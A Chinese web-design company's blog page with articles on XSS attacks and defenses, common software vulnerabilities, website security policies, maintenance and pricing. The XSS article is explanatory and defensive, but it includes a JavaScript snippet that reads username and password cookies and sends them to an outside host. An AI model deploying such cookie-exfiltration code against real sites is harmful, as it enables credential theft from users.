凯鸿沈阳网站建设制作公司,努力成为受人尊敬的互联网领军企业

English  |  宣传视频  |  VR全景展示  |  设为首页  |  收藏本站  |  网站地图  |  XML  |  官方微信
免费咨询电话:
400-885-8845

摘要:随着计算机网络技术的迅速发展,网络安全问题已变得越来越受到人们的重视,网络攻击形式多种多样,很多蠕虫病毒、木马病毒等植入到某些网页中,给网络用户带来了很大的安全隐患。其中XSS跨网站脚本攻击,恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。本文主要阐述了XSS的机理和特点,重点分析了网页代码的检测以及木马的特征,并针对这些特点进行了一些相应防范对策的探讨。关键词:网页木马; XSS; 攻击; 防范一、前言网页木马是一种新型的恶意代码,一些攻击者将它人为的植入到服务器端的HTML页面中,通过客户端对服务器的访问来传播恶意攻击代码,它主要是通过浏览器以及其中的一些插件漏洞来进行植入,网页木马是一种客户端的攻击方式,它能有效的绕过防火墙的检测,隐秘的在客户端将恶意代码植入,客户端在不知情的情况下将这些恶意可执行程序进行下载和执行。给互联网用户造成严重的安全威胁。在Web 2.0出现以后,XSS的危害性达到了十分严重的地步。跨站脚本英文名称是(Cross Site Script),为了与层叠样式表(Cascading Style Sheets简称CSS)区分,故命名为XSS。 XSS攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面时,嵌入其中的脚本将被解释执行。XSS具有自身的独有特点,目前国内外很多研究人员围绕XSS的防御进行了深入的探讨与研究,同时攻击者也在采用一些更先进的手段来提高木马的攻击隐蔽性,用以提高木马的攻击成功率,因此,XSS的机理与防范对策研究已成为了当前计算机工作者的一个重要课题。二、XSS的机理与特征1.XSS的成因跨网站脚本XSS漏洞的成因其实就是Html的注入问题,攻击者的输入没有经过严格的控制进入了数据库,最终显示给来访的用户,导致可以在来访用户的浏览器里以浏览用户的身份执行Html代码,数据流程如下:攻击者的Html输入—>web程序—>进入数据库—>web程序—>用户浏览器。目前,所有的网站上几乎都提供一个站内或站外信息搜索框。在此搜索框中,您可以搜索到网站上任何可用的东西。这个搜索表单看起来这样:图1-1图1-2内部代码:窗体顶端窗体底端“搜索”                             在asp网页上显示的搜索结果,同时它也列出了在“关键字”的搜索结果。web页面上,不管用户搜索什么内容,它将显示搜索结果在网页上。现在如果一个攻击者尝试注入恶意脚本,比如在搜索框中输入如下Html代码:“”则代码会变成<input type="text" name="q" value=""   />,嵌入的JavaScript代码将会被浏览器执行,将显示一个警告框,提示“XSS跨站脚本攻击”。而不能完成用户搜索功能。(上述两个网站已经做XSS过滤,不能看见警告框)下面是一个关于用户注册页面的例子,当然这个示例很简单,几乎攻击不到任何网站,仅仅看看其原理。我们知道很多网站都提供用户注册功能,网站后台数据库存储用户名、密码,方便用户下次登录,有些网站是直接用明文记录用户名、密码,恶意用户注册账户登录后使用简单工具查看cookie结构名称后,如果网站有XSS漏洞,那么简单的就可以获取其它用户的用户名、密码了。图2-1如图2-1所示的用户注册页面。允许用户填入注册信息,然后存储到后台数据库中。因为我们完全信任了用户输入,用户注册信息都能正确的进入数据库。但有些恶意的用户会利用这个漏洞输入HTML和JS代码,例如这段代码直接输入到“用户名”栏中,窃取用户信息。在http://www.123.com/h.js中:var username=CookieHelper.getCookie('username').value;var password=CookieHelper.getCookie('password').value;var script =document.createElement('script');script.src='http://www.123.com/index.asp?username='+username+'&password='+password;document.body.appendChild(script);这样就轻松的获取了cookie中的用户名和密码。2.跨网站脚本攻击的类型2.1非持久性跨网站脚本攻击,非持久性 XSS 也称为是反射跨网站漏洞。它是最常见的 XSS 类型。在这,注入数据反射给攻击者。上面的例1,是非持续的攻击。典型的非持久性 XSS 包含与 XSS 的链接。    2.2持久性跨网站脚本攻击(存储性),持久性跨网站脚本是存储跨站点脚本。当它发生时 XSS 变量存储在网站的数据库,每当用户打开网页时执行。每次用户打开浏览器,脚本执行。持久性 XSS 比非持久性 XSS更有害,因为每当用户打开要查看的内容的网页时,将自动执行该脚本。上面例2就是持久性跨网站脚本攻击。   2.3基于DOM的跨站脚本攻击,基于 DOM 的 XSS 有时也称为“type-0 XSS”。它发生时, XSS 变量执行由 DOM 修改用户的浏览器网页的结果。在客户端的 HTTP 响应不会更改,但以恶意的方式执行的脚本。三、XSS防范对策XSS攻击的模式很简单,就是把自己的代码嵌入到页面里,随页面一块执行;XSS攻击的防范也一样简单,对于网站的开发者,首先应该把精力放到对所有用户提交内容进行可靠的输入验证上。这些提交内容包括HTML、URL、查询关键字、http头、post、get数据等。只接受在你所规定长度范围内、采用适当格式、你所希望的字符。阻塞、过滤或者忽略其它的任何东西。针对出现在不同位置的用户输入内容,其处理策略有所不同。1、html只需要处理掉< > 即可,只要没有html标签,页面就是安全的。可以使用asp内置方法Replace (str,“<”,“<”) replace="">”,“>”) 来处理待输出的内容,将<,>, 转义。2、JS将要输出到js代码片断中的用户输入内容没有好的办法进行处理;仅转义少数字符不能保证去掉所有的攻击可能。因此,一般建议不要把用户产生的内容直接输出到js片断中。如果条件所限,必须将内容直接输出,有如下方法可供选择:1) 如果待输出的内容有特定的取值返回或者特定的格式,可以使用白名单或者正则表达式进行处理。2) 可以将内容输出到html的隐藏标签或隐藏表单中,js通过获取标签的内容得到该内容。3、检查那么,对已有的页面,该如何检查呢?这个问题的回答是,目前没有很好的办法能完全检查出服务器中可能存在XSS攻击的页面;有一些办法可以检查出比较明显的疏漏,其基本思路如下:1)从apache的access_log中取出所有unique的请求,依次修改其某一个参数为 “”,发起请求。2)获取返回的内容,如果内容中有原样的该字符串,表明此可疑输入没有经过处理便输出到页面上,页面存在隐患,需要处理。通过这种办法,可以检查出绝大多数能通过get请求发起的XSS攻击。那些在access_log没有出现的请求参数,这里没有检查到,可能有所遗漏,就需要手动去整理,测试。通过Post发起的请求需要用另外一种策略进行检查。其思路如下:将网站上所有可以输入的表单,依次输入特征字符串,比如说< ' ” >,如果提交后产生的页面中含有未处理的此字符串,说明存在隐患。通过以上分析我们看到,XSS是一种危害较大、较难防范,并且更加隐蔽的攻击方式。其实只要明白其原理,再加上勤加思考防范的对策,就可以根治XSS漏洞。沈阳凯鸿科技有限公司2023/1/1
发布时间:2023-01-01
一、缓冲区溢出漏洞当软件程序试图读取或写入超出范围的缓冲区时,就会发生缓冲区溢出。它可能导致覆盖或在现有代码中附加数据。缓冲区溢出可使攻击者执行代码、更改程序流、读取敏感数据或使系统崩溃等。包括:接受长度不受限制的输入允许从无效索引对数组进行读取操作缓冲区溢出漏洞通常发生在体系结构和设计、实施或操作阶段。这一漏洞最常见于 C,C ++ 和 Assembly 程序,可以以任何缺少内存管理支持的语言出现。如何防范?尽可能选择一种防止或降低此漏洞风险的语言,例如:Java 或 Perl。不要禁用溢出保护,例如在 C# 中。与环境中的易受攻击的本机代码交互时,即使是“免疫”语言也可能会产生错误。为了防止利用缓冲区溢出漏洞,可以使用包含功能或扩展名以限制输入的编译器。例如, Visual Studio 或 StackGuard。还可以使用工具在内存中随机排列程序组件。使地址更难以识别或预测,从而使攻击者难以利用特定组件。最后,在创建代码时,确保正确分配了缓冲区空间。另外,使用允许限制输入大小的方法和功能。二、对输入的验证当用户输入在接受时未得到验证或验证不足时,就会发生输入验证不当。不正确的验证可以使攻击者执行恶意代码、更改程序流、访问敏感数据或滥用资源分配。包括:假设攻击者无法访问隐藏的表单字段仅验证输入的长度而不是内容通常发生在架构、设计和实施阶段。它可以在任何接受外部数据的语言或系统中发生。预防措施应该对任何用户采取“零信任”原则,并假设所有输入都是有害的,直到证明安全为止。使用白名单以确保输入内容仅包含可接受的格式和内容。在验证输入时,长度、类型、语法和对逻辑的符合性(即输入具有语义意义)。可以使用多种工具来确保进行充分的验证,例如 OWASP ESAPI 验证 API 和 RegEx。使用这些工具来验证所有输入源,包括环境变量,查询,文件,数据库和 API 调用。确保在客户端和服务器端都执行检查。可以绕过客户端验证,因此需要仔细检查。如果绕过客户端验证,则在服务器端捕获输入可以帮助你识别攻击者的操纵。在进行任何必要的组合或转换后,请验证输入。三、信息泄露当有意或无意将数据提供给潜在攻击者时,就会发生信息泄露。数据可以包含敏感信息,也可以向攻击者提供有关可以在攻击中利用的软件或环境的信息。信息公开的示例包括:显示文件或程序完整路径的错误错误消息暴露了数据库中用户的存在信息泄漏漏洞通常发生在开发的体系结构和设计或实施阶段。任何语言都可能发生这些漏洞。预防措施为防止信息泄露,应该设计程序体系结构以将敏感信息包含在具有明确信任边界的区域中。确保使用访问控制来保护和限制“安全”区域与端点之间的连接。为了最大程度地利用漏洞,请验证错误消息和用户警告中是否包含不必要的信息。还应该限制来自 URL 和通信标头的敏感信息。例如,模糊完整的路径名或 API 密钥。四、权限认证不当如果未正确分配、跟踪、修改或验证用户权限和凭据,则会发生不正确的权限或身份验证。这些漏洞可使攻击者滥用权限,执行受限任务或访问受限数据。包括:不可逆转的临时权限升级。通过黑名单而不是白名单来限制权限。允许较低的权限级别影响较高的权限帐户,例如:重置管理员密码。无限制的登录尝试或会话限制。权限或身份验证漏洞通常在开发的体系结构和设计,实施或操作阶段引入。任何语言都可能发生这些漏洞。预防措施应该将最小权限原则应用于软件和系统交互的所有用户和服务。通过在整个程序和环境中应用访问控制来限制用户和实体的功能。将权限限制为仅用户或服务所需的那些资源。此外,将高级权限分成多个角色。分离有助于限制“高级用户”,并降低攻击者滥用访问权限的能力。还可以应用多因素身份验证方法来防止攻击者绕过系统或获得轻松的访问权限。五、减少一般漏洞的措施除了采取针对特定漏洞的措施外,还应该采取一些措施来总体上减少漏洞。例如:注威胁情报时刻关注威胁情报,了解新漏洞、新补丁、新举措,防范于未然。进行漏洞评估软件进行定期的渗透测试,提高软件安全性,在攻击者之前发现潜在漏洞的存在,并做好相应的应对措施。沈阳凯鸿科技有限公司2023/1/1
发布时间:2023-01-01
一、网站运行安全保障措施1、网站服务器和其他计算机之间设置防火墙,做好安全策略,拒绝外来的恶意程序攻击,保障网站正常运行。2、在网站的服务器及工作站上均安装了相应的防病毒软件,对计算机病毒、有害电子邮件有整套的防范措施,防止有害信息对网站系统的干扰和破坏。3、做好访问日志的留存。网站具有保存三个月以上的系统运行日志和用户使用日志记录功能,内容包括IP地址及使用情况,主页维护者、对应的IP地址情况等。4、交互式栏目具备有IP地址、身份登记和识别确认功能,对非法贴子或留言能做到及时删除并进行重要信息向相关部门汇报5、网站信息服务系统建立多机备份机制,一旦主系统遇到故障或受到攻击导致不能正常运行,可以在最短的时间内替换主系统提供服务。6、关闭网站系统中暂不使用的服务功能,及相关端口,并及时用补丁修复系统漏洞,定期查杀病毒。7、服务器平时处于锁定状态,并保管好登录密码;后台管理界面设置超级用户名及密码,并绑定IP,以防他人登入。8、网站提供集中式权限管理,针对不同的应用系统、终端、操作人员,由网站系统管理员设置共享数据库信息的访问权限,并设置相应的密码及口令。不同的操作人员设定不同的用户名,且定期更换,严禁操作人员泄漏自己的口令。对操作人员的权限严格按照岗位职责设定,并由网站系统管理员定期检查操作人员权限。9、公司机房按照电信机房标准建设,内有必备的独立UPS不间断电源,能定期进行电力、防火、防潮、防磁和防鼠检查。二、信息安全保密管理制度1、建立健全的信息安全保密管理制度,实现信息安全保密责任制,切实负起确保网络与信息安全保密的责任。严格按照个人负责原则,落实责任制,明确责任人和职责,细化工作措施和流程,建立完善管理制度和实施办法,确保使用网络和提供信息服务的安全。2、网站信息内容更新全部由网站工作人员完成或管理,工作人员素质高、专业水平好,有强烈的责任心和责任感。网站相关信息发布之前有一定的审核程序。工作人员采集信息将严格遵守国家的有关法律、法规和相关规定。严禁通过网站散布《互联网信息管理办法》等相关法律法规明令禁止的信息(即“九不准”),一经发现,立即删除。3、遵守对网站服务信息监视,保存、清除和备份的制度。开展对网络有害信息的清理整治工作,对违法犯罪案件,报告并协助公安机关查处。4、所有信息都及时做备份。按照国家有关规定,网站将保存3月内系统运行日志和用户使用日志记录。5、制定并遵守安全教育和培训制度。加大宣传教育力度,增强用户网络安全意识,自觉遵守互联网管理有关法律、法规,不泄密、不制作和传播有害信息,不链接有害信息或网页。三、用户信息安全管理制度1、尊重并保护用户的个人隐私,除了在与用户签署的隐私政策和网站服务条款以及其他公布的准则规定的情况下,未经用户授权不会随意公布与用户个人身份有关的资料,除非有法律或程序要求。2、严格遵守网站用户帐号使用登记和操作权限管理制度,对用户信息专人管理,严格保密,未经允许不得向他人泄露。定期对相关人员进行网络信息安全培训并进行考核,使相关人员能够充分认识到网络安全的重要性,严格遵守相应规章制度。国安广告将严格执行本规章制度,并形成规范化管理,建立健全信息网络安全小组。安全小组由单位领导负责,网络技术、客户服务等部门参加,并确定至少两名安全负责人作为突发事件处理的联系人。沈阳凯鸿科技有限公司2023/1/1
发布时间:2023-01-01
网站在建成后,长期、艰巨的维护管理工作才刚刚开始,对一个完善的网站来说 日常维护与管理是很重要的,这样网站才能长期稳定、高效地运行在 Internet 上, 做好网站的 内容、链接、布局、数据、系统、服务器等软、硬件的日常维护与管理成为网站安全有效运行 的基础。 关键词:网站;维护;管理;内容;数据 网站好比是一份报纸或一台节目,对其持续维护管理已成为一种日常性事务,然而很多网 站存在重建设、轻管理维护的通病。网站建成之后,会不可避免地遇到各种问题,只有不断改 进设计、创新更多的服务,及时地更新和丰富网站的内容,展现网站的活力与发展,才能引起 访客的兴趣并产生信任感。本文从内容更新、页面布局更新和链接更新、数据管理和备份、操 作系统维护、服务器维护、设备维护和网站测试等方面展开论述。 1 内容更新 内容更新是网站管理的核心内容。人们上网最关心的是有无需要的且可靠、新颖、实用的 信息,网站为保持时效性,要求网页内容新颖、有价值,创意好且有原创性,而且长期坚持更 新才会有吸引力。 比如新闻栏目更新,它是客户了解网站的宣传窗口,它将企业的重大活动、产品的最新动 态、企业的发展趋势等及时、真实地呈现给客户,让访问者觉得企业是一个发展良好并感兴趣 的企业。还有商品信息更新,它是电子商务网站的主体,商务网站的魅力很大程度在于能源源 不断地提供最新最及时的商品信息。另外如企业在线支持管理、在线购物管理、客户信息管 理,以及广告、论坛、留言板、邮箱等的更新维护等等。 稳定的内容更新还可以增加百度的收录率,提高排名,更好地宣传网站,树立网站良好的 形象和知名度。 2 页面布局更新和链接更新 页面布局更新是很重要的,人们很重视第一印象,对页面布局更新宜重新制作,不过网站 的 CI 应不变为宜。 保证网站的链接通畅,经常对网站的链接进行测试确保无误。可以通过测试软件对网站所 有的链接进行测试,但最好还是用手工的方法进行检测,在网站正常运行期间也要经常使用浏 览器测试,查缺补漏。 3 数据管理和备份 数据是企业信息系统的核心内容,是企业通过长时间积累,通过特定的渠道收集的,具有 不可重现的特点,代表着原始的行为特征。网站后台数据库管理和维护主要包含如下: 查找数据丢失或被破坏的原因,如计算机硬件故障、软件故障、病毒、人为误操作、盗窃 等。 备份数据,主要是备份内容和形式、由谁备份、存放的位置、备份频率、备份方法等。 恢复数据,恢复是与备份对应的操作,为了在系统出现异常情况时将数据恢复到某个正常 状态。如果用户数据库出错,通过装入最新的数据库备份以及后来的事务日志备份可以恢复数 据库。 监视系统运行状况,及时处理系统错误。主要是监视当前用户以及进程的信息、监视数据 统计、监视目标占用空间情况,日常监视的主要有:用户数据库、数据库日志表以及计费原始 数据表等。 保证系统数据安全,必须依据系统的实际情况,执行一系列的安全保障措施。 4 操作系统维护 操作系统是一个非常开放而且脆弱的系统,稍微不慎就可能会导致系统受损,甚至瘫痪, 同时也要维护应用服务器软件和应用软件,经常安装与卸载应用软件的也会造成系统的运行速 度降低、冲突增加等问题。 操作系统维护主要有:定期进行磁盘碎片整理和文件扫描;维护系统注册表;经常性地备 份系统注册表;清理无用的 DLL 文件;使用在线病毒检测工具防止病毒入侵;优化操作系统 本身;通过对 Web 服务器的日志文件进行分析和统计,掌握系统运行情况以及网站内容的受 访问的情况,加强对整个网站及其内容的维护和管理。 5 服务器维护 服务器有 web 服务器、邮件服务器、文件邮件服务器等,服务器运行正常与否,决定了整 个网站功能的实现。服务器维护包括系统安装、打补丁、升级;系统配置;系统检查;系统优 化;清洁、保养;覆盖或升级安装;故障判断;故障处理;硬件维修或更换;系统参数调整; 垃圾文件及注册表清理;内存管理优化;磁盘管理优化;启动选项优化;操作系统配置;网络 配置;其他故障解决等,另外对服务器详细地记下特别是故障记录,常查看内存占用情况、硬 盘剩余空间情况、CPU 占用率,原有的配置不能满足要求时要进行测试、升级等操作。6 设备维护和网站测试保证网络交换机、路由器和防火墙等主干设备的正常运转,系统管理员必须做好网络设备 的配置记录,对每次的配置改动作纪录,并备份设备的配置文档,记录配置时间,系统管理员 要定期对硬盘进行整理,清除缓存或垃圾文件,定期保存系统日志,做好系统的硬件维护以及 供电系统维护,对设备定期检查、监测,定期清洁、除尘,保证设备正常运行。 网站测试主要有浏览器兼容测试、代码测试、交互表单及数据查询测试、客户响应测试、 功能测试、性能测试、运行监控、稳定性测试、安全测试等。 7 结语 建立一个完善的网站不仅仅是只要网站的功能完善、操作界面美观就行了,一个完善的网 站是需要不断进行维护与管理。只有长期不断的对网站进行日常维护与管理,才能建立健全网 站,才能高效运行,才有生命力。 
发布时间:2023-01-01
现在建设一个网站是很多企业会选择的展示自己品牌形象的一种途径,但是市面上网站建设的价格有很多,如何建设网站能够更好的达到自己的目的,并且有效的节约成本是很多企业需要考虑的问题,下面就来给大家介绍一下网站建设价格都取决于哪些因素。1、取决于网站类型不同的企业有不同的需求,因此最终成型的网站都有不同的形式,一部分企业对于网站建设的需求只是品牌展示,这样的网站比较简单,在网站建设报价的时候价格就会比较低,因为不需要太多复杂功能,只需要简单的图文呈现即可。如果是一些需要功能实现的网站,那么网站建设价格就会有所上升,因为牵扯到很多交互设计以及功能植入。2、取决于网站使用的技术现在搭建一个网站需要的底层技术都是不一样的,一些简单的网站使用的底层技术都是比较老旧,有很多现成的模板,所以网站建设价格会比较低,有一些使用新技术的网站,在建设成本上会比较高,因此想要确定网站建设价格,也要考虑网站建设使用的技术是新还是旧。3、取决于售后团队有一些网站建设的价格很低,但是在网站交付之后没有很好的售后体系,导致企业在使用网站的时候出现各种问题也无法有效的解决,使网站的利用率和效果都会大打折扣,但是有一些网站虽然售价比较高,售后团队的服务质量也会很好,在后期网站使用的时候,如果出现各种技术问题,只要求助于售后团队,就能妥善的解决。以上三点就是网站建设价格的主要决定因素,至于考虑选择什么样的网站,主要还是根据自己的实际需求来确定的,同时也要考虑到在网站使用过程中的一些问题。只有这样才能建设到适合自己的网站。同时也能在有限的预算之内,极大限度的搞好网站建设。文章来源于网络,如有问题请与我们联系!
发布时间:2022-12-29
共975条  每页5条  页数:2/195   首页 上一页 1 2 3 4 5  ... 下一页 尾页 
案例好不好!  看看才知道!

沈阳凯鸿科技有限公司

SHENYANGKAIHONG TECHNOLOGY CO.,LTD.


服务热线:400-885-8845

电话(TEL):024-62640980
Email: zhangmiao@sykh.cn   kh@sykh.cn
地址(add):沈阳市和平区新世界商业中心 

中华路61号 803 室 

【关注微信】
【关注微信】
【关注抖音】

g.png 辽公网安备 21010202000807号  Copyright © 凯鸿科技 版权所有   辽ICP备11015922号-1

服务项目: 网站建设/制作,抖音运营拍摄,祥云平台,全球贸易通,CPT竞价推广!

获取网络营销方案,有想法请联系我们